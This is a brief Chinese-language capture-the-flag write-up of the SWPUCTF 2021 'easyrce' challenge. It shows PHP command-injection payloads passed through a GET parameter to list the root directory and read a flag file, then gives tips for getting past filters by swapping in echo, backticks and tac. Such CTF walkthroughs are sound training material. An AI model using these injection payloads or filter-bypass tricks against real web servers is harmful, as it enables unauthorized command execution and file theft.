[SWPUCTF 2021 新生賽]easyrce

山际见来烟發表於2024-06-01

這道題比較簡單,開啟環境一看就只需要構造一個get傳參的命令就行,我們就看一下有些什麼檔案,構造payload:
?url=system ("ls /");

看到有個 flllllaaaaaaggggggg ,我們猜測flag肯定就在裡面,所以我們用cat來檢視這個檔案(一定要注意cat後面的空格!!!):
?url=system ("cat /flllllaaaaaaggggggg");

就解出來啦

注意,這道題是沒有任何過濾的,有時候system啊()還有cat被過濾了什麼的,可以用下面一些方式代替:
echo有些情況下可以代替system
``可以代替()
tac可以代替cat

相關文章